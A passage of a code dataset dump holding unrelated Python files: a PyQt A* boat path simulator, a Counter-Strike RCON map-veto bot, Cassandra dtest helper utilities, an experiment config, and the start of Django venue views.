trajectory[i+1][0], -c * trajectory[i+1][1]), pen_trajectory)\r\n\r\n ## 지난 경로 그리기\r\n pen_pastPath = QPen(Qt.green)\r\n if len(past_path) > 1:\r\n for i in range(len(past_path) - 1):\r\n self.scene.addLine(QLineF(c * past_path[i][0], -c * past_path[i][1],\r\n c * past_path[i + 1][0], -c * past_path[i + 1][1]), pen_pastPath)\r\n\r\n ## 장애물 그리기\r\n pen_obstacle = QPen(Qt.black)\r\n for i in range(len(obstacles)):\r\n obstacle_diameter = c * 0.4\r\n self.scene.addEllipse(c * obstacles[i][0] - obstacle_diameter/2, -c * obstacles[i][1] - obstacle_diameter/2,\r\n obstacle_diameter, obstacle_diameter, pen_obstacle, QBrush(Qt.black))\r\n\r\n ## 배 그리기\r\n pen_boat = QPen(Qt.green)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * cur_pos[0] - diameter / 2, -c * cur_pos[1] - diameter / 2,\r\n diameter, diameter, pen_boat, QBrush(Qt.green))\r\n\r\n ## 출발지점 그리기\r\n pen_start = QPen(Qt.red)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * start_pos[0] - diameter / 2, -c * start_pos[1] - diameter / 2,\r\n diameter, diameter, pen_start, QBrush(Qt.red))\r\n\r\n ## 목적지 그리기\r\n pen_arrival_range = QPen(Qt.blue, 0.8)\r\n diameter = c * arrival_range\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_arrival_range, QBrush(Qt.white))\r\n pen_end = QPen(Qt.blue)\r\n diameter = c * 0.4\r\n self.scene.addEllipse(c * end_pos[0] - diameter / 2, -c * end_pos[1] - diameter / 2,\r\n diameter, diameter, pen_end, QBrush(Qt.blue))\r\n\r\n # self.status_bar = self.statusBar() #AttributeError: 'SimulationWindow' object has no attribute 'statusBar'\r\n\r\n # def mouseMoveEvent(self, event):\r\n # mouse_pt = \"Mouse Point : x={0},y={1}, global={2},{3}\".format(event.x(), event.y(), event.globalX(),\r\n # event.globalY())\r\n # # self.status_bar().showMessage(mouse_pt)\r\n # # print(mouse_pt)\r\n # self.ui.status_lineEdit.setText(mouse_pt)\r\n\r\n\r\nclass GraphicsScene(QGraphicsScene):\r\n def __init__(self, parent=None):\r\n QGraphicsScene.__init__(self, parent=None)\r\n\r\n # def mousePressEvent(self, event): #이걸로 써야 할까?\r\n # global goal_from_picture_x, goal_from_picture_y\r\n #\r\n # goal_from_picture_x = (event.scenePos().x() - 10) * 0.05\r\n # goal_from_picture_y = -(event.scenePos().y() - 50) * 0.05\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n window = SimulationWindow()\r\n window.show()\r\n sys.exit(app.exec_())\r\n","sub_path":"A_star/Simulator/A_star_Simulation.py","file_name":"A_star_Simulation.py","file_ext":"py","file_size_in_byte":19485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"186157644","text":"from srcds.rcon import RconConnection, RconAuthError\nfrom random import choice\nimport config as cfg\nimport stuff\nimport logging\n\n\n\nclass CsServer:\n def __init__(self, bot, addr, token):\n self.bot = bot\n addr = addr.split(':')\n self.addr = addr[0]\n self.rconPort = addr[1]\n self.token = token\n\n self.live = False\n\n self.format = \"bo1\"\n self.pool = cfg.pool\n self.map = \"\"\n self.maps = []\n self.picked = []\n self.banned = []\n self.vetoTurn = \"\"\n\n self.freeze = False\n self.paused = False\n self.score = \"?\"\n self.readyStatus = {\"TERRORIST\": False, \"CT\": False}\n self.teamNames = {\"TERRORIST\": \"Terrorists\", \"CT\": \"Counter-Terrorists\"}\n self.players = {} #steam id : team\n\n print(\"Server added: \", self.addr, \":\", self.rconPort, \", token: \", self.token)\n logging.info(\"Server added: \", self.addr, \":\", self.rconPort, \", token: \", self.token)\n self.rcon(\"say Hi! I'm AppelsiiniBot!\")\n self.rcon(stuff.exports[\"CONFIG\"]) # TODO: miksi viimeinen say komento ei mene läpi (serverillä ei näy viestiä)?\n\n\n def rcon(self, command):\n try:\n conn = RconConnection(self.addr, port=self.rconPort, password=cfg.rconPw)\n # The command has a 1000 char limit so split a big command into multiple commands\n if len(command) < 1000:\n conn.exec_command(command)\n else:\n while len(command) > 1000:\n i = command.rfind(\";\", 0, 1000)\n if i == -1:\n logging.error(\"Rcon-error: Over 1000 char command without a ';'\")\n return\n conn.exec_command(command[0:i+1])\n command = command[i+1:]\n conn.exec_command(command)\n print(command)\n except RconAuthError:\n logging.error(f'rcon: RconAuthError: addr={self.addr}, port={self.rconPort}')\n return\n except ConnectionRefusedError:\n logging.error(f'rcon: ConnectionRefusedError: addr={self.addr}, port={self.rconPort}')\n return\n except IndexError:\n logging.error(f'rcon: IndexError: {command}')\n\n def connected(self, match):\n # TODO: akl registered (and team) check\n print(\"connected, token:\", self.token)\n self.players[match[2]] = \"Unassigned\"\n\n def disconnect(self, match):\n # TODO: match pause on disconnect?\n print(\"disconnected, token:\", self.token)\n try:\n del self.players[match[2]]\n except KeyError:\n logging.error(f\"disconnect: KeyError, steamid {match[2]}\")\n return\n\n def switched_teams(self, match):\n print(\"switched_teams, token:\", self.token)\n self.players[match[2]] = match[4]\n\n def map_change(self, match):\n print(\"map_change, token:\", self.token)\n\n def map_end(self, match):\n print(\"map_end\")\n\n def round_start(self, match):\n print(\"round_start, token:\", self.token)\n\n def round_end(self, match):\n print(\"round_end, token:\", self.token)\n print(\"Winner: \", match[0], \" ct_score: \", match[1], \"t_score: \", match[2])\n\n def ready(self, match):\n team = match[3]\n if not self.live:\n if not self.readyStatus[team]:\n self.readyStatus[team] = True\n cmd = f'say Team {self.teamNames[team]} is ready!'\n self.rcon(cmd)\n\n if self.readyStatus[\"TERRORIST\"] and self.readyStatus[\"CT\"]:\n # start match\n print(\"ready\")\n self.rcon(\"say Starting match\")\n else:\n if self.paused:\n if not self.readyStatus[team]:\n self.readyStatus[team] = True\n cmd = \"say Team \" + team + \" is ready!\"\n self.rcon(cmd)\n if self.readyStatus[\"TERRORIST\"] and self.readyStatus[\"CT\"]:\n #TODO: unpauseta\n self.rcon(\"say Unpausing the match.\")\n\n # Starts the veto process\n def start(self, match):\n # TODO: halutaanko estää alle/yli 10 pelaajan aloitukset?\n # TODO: miten joukkueen nimi päätetään? ennen starttia, ennen readyä, servulta(toivottavasti)?\n self.resetGameState()\n terrorists = 0\n cts = 0\n teams = self.players.values()\n for i in teams:\n if i == \"TERRORIST\":\n terrorists += 1\n elif i ==\"CT\":\n cts += 1\n\n self.pool = cfg.pool\n self.vetoTurn = choice([\"TERRORIST\", \"CT\"])\n self.rcon(stuff.exports[\"VETO\"].format(self.vetoTurn, self.pool))\n return\n\n def pick(self, match):\n if self.live or self.vetoTurn == \"\":\n return\n\n if match[3] != self.vetoTurn:\n self.rcon(f\"say \\x10It's not your turn, {self.teamNames[match[3]]}!\")\n return\n if self.format == \"bo1\":\n self.rcon(f\"\\x10There's no picking in a best of 1! Try banning a map instead. \\x06{self.pool}\")\n return\n if self.format == \"bo3\" and len(self.pool) in [4, 5]:\n cmd = match[4].split()\n try:\n if cmd[1] in self.pool:\n self.picked.append(cmd[1])\n self.pool.remove(cmd[1])\n if self.vetoTurn == \"TERRORIST\":\n self.vetoTurn = \"CT\"\n else:\n self.vetoTurn = \"TERRORIST\"\n if len(self.picked) == 1:\n self.rcon(f'say \\x10{self.teamNames[match[3]]} picked {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn to pick \\x06{self.pool}')\n else:\n self.rcon(\n f'say \\x10{self.teamNames[match[3]]} picked {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn to ban \\x06{self.pool}')\n\n except IndexError:\n self.rcon(\"say \\x10I don't understand.\")\n else:\n self.rcon(f\"say \\x10{self.teamNames[self.vetoTurn]} it's your turn to \\x06!ban \\x10a map. \\x06{self.pool}\")\n\n def ban(self, match):\n if self.live or self.vetoTurn == \"\":\n return\n if match[3] != self.vetoTurn:\n self.rcon(f\"say \\x10It's not your turn, {self.teamNames[match[3]]}!\")\n return\n cmd = match[4].split(\" \")\n try:\n if self.format == \"bo3\" and len(self.pool) in [4, 5]:\n self.rcon(f\"\\x10{self.teamNames[self.vetoTurn]}, it's your turn to \\x06!pick\\x10 a map. \\x06{self.pool}\")\n return\n if cmd[1] in self.pool:\n self.banned.append(cmd[1])\n self.pool.remove(cmd[1])\n if self.vetoTurn == \"TERRORIST\":\n self.vetoTurn = \"CT\"\n else:\n self.vetoTurn = \"TERRORIST\"\n if len(self.banned) == 6 or (self.format == \"bo3\" and len(self.banned) == 4):\n self.picked.append(self.pool[0])\n self.rcon(f'say \\x10{self.teamNames[match[3]]} banned {cmd[1]}. \\x06{self.pool[0]}'\n f' \\x10was automatically picked as the last map remaining.')\n else:\n self.rcon(f'say \\x10{self.teamNames[match[3]]} banned {cmd[1]}. {self.teamNames[self.vetoTurn]},'\n f' your turn. \\x06{self.pool}')\n elif cmd[1] in self.picked:\n self.rcon(f'say \\x10{cmd[1]} is already picked! {self.teamNames[self.vetoTurn]}s try banning again: \\x06{self.pool}')\n elif cmd[1] in self.banned:\n self.rcon(f'say \\x10{cmd[1]} is already banned! {self.teamNames[self.vetoTurn]}s try banning again: \\x06{self.pool}')\n else:\n self.rcon(\"say \\x10Failed to ban a map.\")\n except IndexError:\n self.rcon(\"say \\x10I don't understand\")\n\n def resetGameState(self):\n # TODO: mieti tarkemmin onko kaikki nää tarpeellisia esim. nimen resettaus\n self.live = False\n self.format = \"bo1\"\n self.pool = cfg.pool\n self.map = \"\"\n self.maps = []\n self.picked = []\n self.banned = []\n self.vetoTurn = \"\"\n\n self.freeze = False\n self.paused = False\n self.score = \"?\"\n self.readyStatus = {\"TERRORIST\": False, \"CT\": False}\n self.teamNames = {\"TERRORIST\": \"Terrorists\", \"CT\": \"Counter-Terrorists\"}\n\n","sub_path":"csserver.py","file_name":"csserver.py","file_ext":"py","file_size_in_byte":8660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"63494045","text":"import fileinput\nimport functools\nimport os\nimport random\nimport re\nimport subprocess\nimport sys\nimport tempfile\nimport time\nimport unittest\nfrom distutils.version import LooseVersion\nfrom threading import Thread\n\nimport assertions\nfrom cassandra import ConsistencyLevel\nfrom cassandra.concurrent import execute_concurrent_with_args\nfrom cassandra.query import SimpleStatement\nfrom ccmlib.node import Node\nfrom nose.plugins.attrib import attr\nfrom nose.tools import assert_equal, assert_in, assert_true, assert_is_instance\n\nfrom dtest import CASSANDRA_DIR, DISABLE_VNODES, IGNORE_REQUIRE, debug\n\n\nclass RerunTestException(Exception):\n \"\"\"\n This exception can be raised to signal a likely harmless test problem. If fixing a test is reasonable, that should be preferred.\n\n Ideally this is used in conjunction with the 'flaky' decorator, allowing the test to be automatically re-run and passed.\n When raising this exception in methods decorated with @flaky(rerun_filter=requires_rerun), do so carefully.\n Avoid overly broad try/except blocks, otherwise real (intermittent) bugs could be masked.\n\n example usage:\n\n @flaky(rerun_filter=requires_rerun) # see requires_rerun method below in this module\n def some_flaky_test():\n # some predictable code\n # more predictable code\n\n try:\n # some code that occasionally fails for routine/predictable reasons (e.g. timeout)\n except SomeNarrowException:\n raise RerunTestException\n\n When the test raises RerunTestException, the flaky plugin will re-run the test and it will pass if the next attempt(s) succeed.\n \"\"\"\n\n\ndef requires_rerun(err, *args):\n \"\"\"\n For use in conjunction with the flaky decorator and it's rerun_filter argument. See RerunTestException above.\n\n Returns True if the given flaky failure data (err) is of type RerunTestException, otherwise False.\n \"\"\"\n # err[0] contains the type of the error that occurred\n return err[0] == RerunTestException\n\n\ndef rows_to_list(rows):\n new_list = [list(row) for row in rows]\n return new_list\n\n\ndef create_c1c2_table(tester, session, read_repair=None):\n tester.create_cf(session, 'cf', columns={'c1': 'text', 'c2': 'text'}, read_repair=read_repair)\n\n\ndef insert_c1c2(session, keys=None, n=None, consistency=ConsistencyLevel.QUORUM):\n if (keys is None and n is None) or (keys is not None and n is not None):\n raise ValueError(\"Expected exactly one of 'keys' or 'n' arguments to not be None; \"\n \"got keys={keys}, n={n}\".format(keys=keys, n=n))\n if n:\n keys = list(range(n))\n\n statement = session.prepare(\"INSERT INTO cf (key, c1, c2) VALUES (?, 'value1', 'value2')\")\n statement.consistency_level = consistency\n\n execute_concurrent_with_args(session, statement, [['k{}'.format(k)] for k in keys])\n\n\ndef query_c1c2(session, key, consistency=ConsistencyLevel.QUORUM, tolerate_missing=False, must_be_missing=False):\n query = SimpleStatement('SELECT c1, c2 FROM cf WHERE key=\\'k%d\\'' % key, consistency_level=consistency)\n rows = list(session.execute(query))\n if not tolerate_missing:\n assertions.assert_length_equal(rows, 1)\n res = rows[0]\n assert_true(len(res) == 2 and res[0] == 'value1' and res[1] == 'value2', res)\n if must_be_missing:\n assertions.assert_length_equal(rows, 0)\n\n\n# work for cluster started by populate\ndef new_node(cluster, bootstrap=True, token=None, remote_debug_port='0', data_center=None):\n i = len(cluster.nodes) + 1\n node = Node('node%s' % i,\n cluster,\n bootstrap,\n ('127.0.0.%s' % i, 9160),\n ('127.0.0.%s' % i, 7000),\n str(7000 + i * 100),\n remote_debug_port,\n token,\n binary_interface=('127.0.0.%s' % i, 9042))\n cluster.add(node, not bootstrap, data_center=data_center)\n return node\n\n\ndef insert_columns(tester, session, key, columns_count, consistency=ConsistencyLevel.QUORUM, offset=0):\n upds = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%06d\\'\" % (i, key, i) for i in xrange(offset * columns_count, columns_count * (offset + 1))]\n query = 'BEGIN BATCH %s; APPLY BATCH' % '; '.join(upds)\n simple_query = SimpleStatement(query, consistency_level=consistency)\n session.execute(simple_query)\n\n\ndef query_columns(tester, session, key, columns_count, consistency=ConsistencyLevel.QUORUM, offset=0):\n query = SimpleStatement('SELECT c, v FROM cf WHERE key=\\'k%s\\' AND c >= \\'c%06d\\' AND c <= \\'c%06d\\'' % (key, offset, columns_count + offset - 1), consistency_level=consistency)\n res = list(session.execute(query))\n assertions.assert_length_equal(res, columns_count)\n for i in xrange(0, columns_count):\n assert_equal(res[i][1], 'value{}'.format(i + offset))\n\n\ndef retry_till_success(fun, *args, **kwargs):\n timeout = kwargs.pop('timeout', 60)\n bypassed_exception = kwargs.pop('bypassed_exception', Exception)\n\n deadline = time.time() + timeout\n while True:\n try:\n return fun(*args, **kwargs)\n except bypassed_exception:\n if time.time() > deadline:\n raise\n else:\n # brief pause before next attempt\n time.sleep(0.25)\n\n\n# Simple puts and get (on one row), testing both reads by names and by slice,\n# with overwrites and flushes between inserts to make sure we hit multiple\n# sstables on reads\ndef putget(cluster, session, cl=ConsistencyLevel.QUORUM):\n\n _put_with_overwrite(cluster, session, 1, cl)\n\n # reads by name\n # We do not support proper IN queries yet\n # if cluster.version() >= \"1.2\":\n # session.execute('SELECT * FROM cf USING CONSISTENCY %s WHERE key=\\'k0\\' AND c IN (%s)' % (cl, ','.join(ks)))\n # else:\n # session.execute('SELECT %s FROM cf USING CONSISTENCY %s WHERE key=\\'k0\\'' % (','.join(ks), cl))\n # _validate_row(cluster, session)\n # slice reads\n query = SimpleStatement('SELECT * FROM cf WHERE key=\\'k0\\'', consistency_level=cl)\n rows = list(session.execute(query))\n _validate_row(cluster, rows)\n\n\ndef _put_with_overwrite(cluster, session, nb_keys, cl=ConsistencyLevel.QUORUM):\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i, k, i) for i in xrange(0, 100)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i * 4, k, i * 2) for i in xrange(0, 50)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n for k in xrange(0, nb_keys):\n kvs = [\"UPDATE cf SET v=\\'value%d\\' WHERE key=\\'k%s\\' AND c=\\'c%02d\\'\" % (i * 20, k, i * 5) for i in xrange(0, 20)]\n query = SimpleStatement('BEGIN BATCH %s APPLY BATCH' % '; '.join(kvs), consistency_level=cl)\n session.execute(query)\n time.sleep(.01)\n cluster.flush()\n\n\ndef _validate_row(cluster, res):\n assertions.assert_length_equal(res, 100)\n for i in xrange(0, 100):\n if i % 5 == 0:\n assert_equal(res[i][2], 'value{}'.format(i * 4), 'for {}, expecting value{}, got {}'.format(i, i * 4, res[i][2]))\n elif i % 2 == 0:\n assert_equal(res[i][2], 'value{}'.format(i * 2), 'for {}, expecting value{}, got {}'.format(i, i * 2, res[i][2]))\n else:\n assert_equal(res[i][2], 'value{}'.format(i), 'for {}, expecting value{}, got {}'.format(i, i, res[i][2]))\n\n\n# Simple puts and range gets, with overwrites and flushes between inserts to\n# make sure we hit multiple sstables on reads\ndef range_putget(cluster, session, cl=ConsistencyLevel.QUORUM):\n keys = 100\n\n _put_with_overwrite(cluster, session, keys, cl)\n\n paged_results = session.execute('SELECT * FROM cf LIMIT 10000000')\n rows = [result for result in paged_results]\n\n assertions.assert_length_equal(rows, keys * 100)\n for k in xrange(0, keys):\n res = rows[:100]\n del rows[:100]\n _validate_row(cluster, res)\n\n\ndef replace_in_file(filepath, search_replacements):\n \"\"\"\n In-place file search and replace.\n\n filepath - The path of the file to edit\n search_replacements - a list of tuples (regex, replacement) that\n represent however many search and replace operations you wish to\n perform.\n\n Note: This does not work with multi-line regexes.\n \"\"\"\n for line in fileinput.input(filepath, inplace=True):\n for regex, replacement in search_replacements:\n line = re.sub(regex, replacement, line)\n sys.stdout.write(line)\n\n\ndef generate_ssl_stores(base_dir, passphrase='cassandra'):\n \"\"\"\n Util for generating ssl stores using java keytool -- nondestructive method if stores already exist this method is\n a no-op.\n\n @param base_dir (str) directory where keystore.jks, truststore.jks and ccm_node.cer will be placed\n @param passphrase (Optional[str]) currently ccm expects a passphrase of 'cassandra' so it's the default but it can be\n overridden for failure testing\n @return None\n @throws CalledProcessError If the keytool fails during any step\n \"\"\"\n\n if os.path.exists(os.path.join(base_dir, 'keystore.jks')):\n debug(\"keystores already exists - skipping generation of ssl keystores\")\n return\n\n debug(\"generating keystore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-genkeypair', '-alias', 'ccm_node', '-keyalg', 'RSA', '-validity', '365',\n '-keystore', os.path.join(base_dir, 'keystore.jks'), '-storepass', passphrase,\n '-dname', 'cn=Cassandra Node,ou=CCMnode,o=DataStax,c=US', '-keypass', passphrase])\n debug(\"exporting cert from keystore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-export', '-rfc', '-alias', 'ccm_node',\n '-keystore', os.path.join(base_dir, 'keystore.jks'),\n '-file', os.path.join(base_dir, 'ccm_node.cer'), '-storepass', passphrase])\n debug(\"importing cert into truststore.jks in [{0}]\".format(base_dir))\n subprocess.check_call(['keytool', '-import', '-file', os.path.join(base_dir, 'ccm_node.cer'),\n '-alias', 'ccm_node', '-keystore', os.path.join(base_dir, 'truststore.jks'),\n '-storepass', passphrase, '-noprompt'])\n\n\nclass since(object):\n\n def __init__(self, cass_version, max_version=None):\n self.cass_version = LooseVersion(cass_version)\n self.max_version = max_version\n if self.max_version is not None:\n self.max_version = LooseVersion(self.max_version)\n\n def _skip_msg(self, version):\n if version < self.cass_version:\n return \"%s < %s\" % (version, self.cass_version)\n if self.max_version and version > self.max_version:\n return \"%s > %s\" % (version, self.max_version)\n\n def _wrap_setUp(self, cls):\n orig_setUp = cls.setUp\n\n @functools.wraps(cls.setUp)\n def wrapped_setUp(obj, *args, **kwargs):\n orig_setUp(obj, *args, **kwargs)\n version = LooseVersion(obj.cluster.version())\n msg = self._skip_msg(version)\n if msg:\n obj.skip(msg)\n\n cls.setUp = wrapped_setUp\n return cls\n\n def _wrap_function(self, f):\n @functools.wraps(f)\n def wrapped(obj):\n version = LooseVersion(obj.cluster.version())\n msg = self._skip_msg(version)\n if msg:\n obj.skip(msg)\n f(obj)\n return wrapped\n\n def __call__(self, skippable):\n if isinstance(skippable, type):\n return self._wrap_setUp(skippable)\n return self._wrap_function(skippable)\n\n\ndef no_vnodes():\n \"\"\"\n Skips the decorated test or test class if using vnodes.\n \"\"\"\n return unittest.skipIf(not DISABLE_VNODES, 'Test disabled for vnodes')\n\n\ndef require(require_pattern, broken_in=None):\n \"\"\"\n Skips the decorated class or method, unless the argument\n 'require_pattern' is a case-insensitive regex match for the name of the git\n branch in the directory from which Cassandra is running. For example, the\n method defined here:\n\n @require('compaction-fixes')\n def compaction_test(self):\n ...\n\n will run if Cassandra is running from a directory whose current git branch\n is named 'compaction-fixes'. If 'require_pattern' were\n '.*compaction-fixes.*', it would run only when Cassandra is being run from a\n branch whose name contains 'compaction-fixes'.\n\n To accommodate current branch-naming conventions, it also will run if the\n current Cassandra branch matches 'CASSANDRA-{require_pattern}'. This allows\n users to run tests like:\n\n @require(4200)\n class TestNewFeature(self):\n ...\n\n on branches named 'CASSANDRA-4200'.\n\n If neither 'require_pattern' nor 'CASSANDRA-{require_pattern}' is a\n case-insensitive match for the name of Cassandra's current git branch, the\n test function or class will be skipped with unittest.skip.\n\n To run decorated methods as if they were not decorated with @require, set\n the environment variable IGNORE_REQUIRE to 'yes' or 'true'. To only run\n methods decorated with require, set IGNORE_REQUIRE to 'yes' or 'true' and\n run `nosetests` with `-a required`. (This uses the built-in `attrib`\n plugin.)\n \"\"\"\n tagging_decorator = attr('required')\n if IGNORE_REQUIRE:\n return tagging_decorator\n require_pattern = str(require_pattern)\n git_branch = ''\n git_branch = cassandra_git_branch()\n\n if git_branch:\n git_branch = git_branch.lower()\n run_on_branch_patterns = (require_pattern, 'cassandra-{b}'.format(b=require_pattern))\n # always run the test if the git branch name matches\n if any(re.match(p, git_branch, re.IGNORECASE) for p in run_on_branch_patterns):\n return tagging_decorator\n # if skipping a buggy/flapping test, use since\n elif broken_in:\n def tag_and_skip_after_version(decorated):\n return since('0', broken_in)(tagging_decorator(decorated))\n return tag_and_skip_after_version\n # otherwise, skip with a message\n else:\n def tag_and_skip(decorated):\n return unittest.skip('require ' + str(require_pattern))(tagging_decorator(decorated))\n return tag_and_skip\n else:\n return tagging_decorator\n\n\ndef known_failure(failure_source, jira_url, flaky=False, notes=''):\n \"\"\"\n Tag a test as a known failure. Associate it with the URL for a JIRA\n ticket and tag it as flaky or not.\n\n Valid values for failure_source include: 'cassandra', 'test', 'driver', and\n 'systemic'.\n\n To run all known failures, use the functionality provided by the nosetests\n attrib plugin, using the known_failure and known_flaky attributes:\n\n # only run tests that are known to fail\n $ nosetests -a known_failure\n # only run tests that are not known to fail\n $ nosetests -a !known_failure\n # only run tests that fail because of cassandra bugs\n $ nosetests -a known_failure=cassandra\n # only run tests that fail because of cassandra bugs, but are not flaky\n $ nosetests -a known_failure=cassandra -a !known_flaky\n\n Known limitations: a given test may only be tagged once and still work as\n expected with the attrib plugin machinery; if you decorate a test with\n known_failure multiple times, the known_failure attribute of that test\n will have the value applied by the outermost instance of the decorator.\n \"\"\"\n valid_failure_sources = ('cassandra', 'test', 'systemic', 'driver')\n\n def wrapper(f):\n assert_in(failure_source, valid_failure_sources)\n assert_is_instance(flaky, bool)\n\n tagged_func = attr(known_failure=failure_source,\n jira_url=jira_url)(f)\n if flaky:\n tagged_func = attr('known_flaky')(tagged_func)\n\n tagged_func = attr(failure_notes=notes)(tagged_func)\n return tagged_func\n return wrapper\n\n\ndef cassandra_git_branch(cdir=None):\n '''Get the name of the git branch at CASSANDRA_DIR.\n '''\n cdir = CASSANDRA_DIR if cdir is None else cdir\n try:\n p = subprocess.Popen(['git', 'branch'], cwd=cdir,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n except OSError as e: # e.g. if git isn't available, just give up and return None\n debug('shelling out to git failed: {}'.format(e))\n return\n\n out, err = p.communicate()\n # fail if git failed\n if p.returncode != 0:\n raise RuntimeError('Git printed error: {err}'.format(err=err))\n [current_branch_line] = [line for line in out.splitlines() if line.startswith('*')]\n return current_branch_line[1:].strip()\n\n\ndef safe_mkdtemp():\n tmpdir = tempfile.mkdtemp()\n # \\ on Windows is interpreted as an escape character and doesn't do anyone any favors\n return tmpdir.replace('\\\\', '/')\n\n\nclass InterruptBootstrap(Thread):\n\n def __init__(self, node):\n Thread.__init__(self)\n self.node = node\n\n def run(self):\n self.node.watch_log_for(\"Prepare completed\")\n self.node.stop(gently=False)\n\n\nclass InterruptCompaction(Thread):\n \"\"\"\n Interrupt compaction by killing a node as soon as\n the \"Compacting\" string is found in the log file\n for the table specified. This requires debug level\n logging in 2.1+ and expects debug information to be\n available in a file called \"debug.log\" unless a\n different name is passed in as a paramter.\n \"\"\"\n\n def __init__(self, node, tablename, filename='debug.log', delay=0):\n Thread.__init__(self)\n self.node = node\n self.tablename = tablename\n self.filename = filename\n self.delay = delay\n self.mark = node.mark_log(filename=self.filename)\n\n def run(self):\n self.node.watch_log_for(\"Compacting(.*)%s\" % (self.tablename,), from_mark=self.mark, filename=self.filename)\n if self.delay > 0:\n random_delay = random.uniform(0, self.delay)\n debug(\"Sleeping for {} seconds\".format(random_delay))\n time.sleep(random_delay)\n debug(\"Killing node {}\".format(self.node.address()))\n self.node.stop(gently=False)\n\n\nclass KillOnBootstrap(Thread):\n\n def __init__(self, node):\n Thread.__init__(self)\n self.node = node\n\n def run(self):\n self.node.watch_log_for(\"JOINING: Starting to bootstrap\")\n self.node.stop(gently=False)\n\n\ndef get_keyspace_metadata(session, keyspace_name):\n cluster = session.cluster\n cluster.refresh_keyspace_metadata(keyspace_name)\n return cluster.metadata.keyspaces[keyspace_name]\n\n\ndef get_schema_metadata(session):\n cluster = session.cluster\n cluster.refresh_schema_metadata()\n return cluster.metadata\n\n\ndef get_table_metadata(session, keyspace_name, table_name):\n cluster = session.cluster\n cluster.refresh_table_metadata(keyspace_name, table_name)\n return cluster.metadata.keyspaces[keyspace_name].tables[table_name]\n","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":19446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"204515353","text":"import sys\nimport os\nimport time\nimport numpy as np\nfrom easydict import EasyDict as edict\nimport argparse\n\nC = edict()\nconfig = C\ncfg = C\n\nC.repo_name = 'semantic-segmentation-pytorch'\n\"\"\" The absolute path\"\"\"\nC.abs_dir = os.path.realpath(\".\")\n\"\"\" The name of this folder\"\"\"\nC.config_dir = C.abs_dir.split(os.path.sep)[-1]\n\"\"\" segm dir \"\"\"\nC.seg_dir = C.abs_dir[:C.abs_dir.index(C.repo_name) + len(C.repo_name)]\n\"\"\" The log root folder\"\"\"\nC.log_dir = C.seg_dir + '/log/' + C.config_dir\n\"\"\" The log \"\"\"\nC.log_dir_link = os.path.join(C.abs_dir, 'log')\n\"\"\" The exp_pref for this experiment \"\"\"\nC.exp_time = time.strftime('%Y_%m_%d_%H_%M_%S', time.localtime())\n\"\"\" The snapshots folder\"\"\"\nC.snapshot_dir = C.log_dir + '/snapshot/'\n\"\"\" The log file path\"\"\"\nC.log_file = C.log_dir + '/log_' + C.exp_time + '.log'\nC.link_log_file = C.log_dir + '/log_last.log'\nC.val_log_file = C.log_dir + '/val_' + C.exp_time + '.log'\nC.link_val_log_file = C.log_dir + '/val_last.log'\n\nC.img_root_folder = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/\"\nC.ann_root_folder = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/\"\nC.train_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/train.txt\"\nC.eval_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/val.txt\"\nC.test_source = \"/unsullied/sharefs/liuhuanyu/workspace/VOC2012_AUG/config/voc12_test.txt\"\n\n\nC.pretrain_model = os.path.join(C.seg_dir, 'pretrain_model/resnet101-5d3b4d8f.pth')\n\n\ndef add_path(path):\n if path not in sys.path:\n sys.path.insert(0, path)\n\n\n#add_path(os.path.join(C.seg_dir, 'utils'))\nadd_path(C.seg_dir)\n#add_path(os.path.join(C.seg_dir, 'utils'))\n\n\nif __name__ == '__main__':\n for i in C:\n print(i, C[i])\n # parser = argparse.ArgumentParser()\n\n\n\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"599051723","text":"from django.shortcuts import render\nimport calendar\nfrom calendar import HTMLCalendar\nfrom datetime import datetime \nfrom django.http import HttpResponseRedirect \nfrom .models import Event, Venue\nfrom .forms import VenueForm\n\ndef search_destinations(request):\n\tif request.method == \"POST\":\n\t\tsearched = request.POST['searched']\n\t\tvenues = Venue.objects.filter(name__contains=searched)\n\t\treturn render(request, 'events/search_destinations.html',\n\t\t{'searched':searched, 'venues':venues})\n\telse:\n\t\treturn render(request, 'events/search_destinations.html',\n\t\t{})\n\t\n\t\n\n \n\ndef show_venue(request, venue_id):\n\tvenue = Venue.objects.get(pk=venue_id)\n\treturn render(request, 'events/show_venue.html',\n\t\t{'venue': venue})\n\ndef list_venues(request):\n\tvenue_list = Venue.objects.all()\n\treturn render(request, 'events/venues.html',\n\t\t{'venue_list': venue_list})\n\ndef add_venue(request):\n\tsubmitted = False\n\tif request.method == \"POST\":\n\t\tform = VenueForm\n\t\tform = 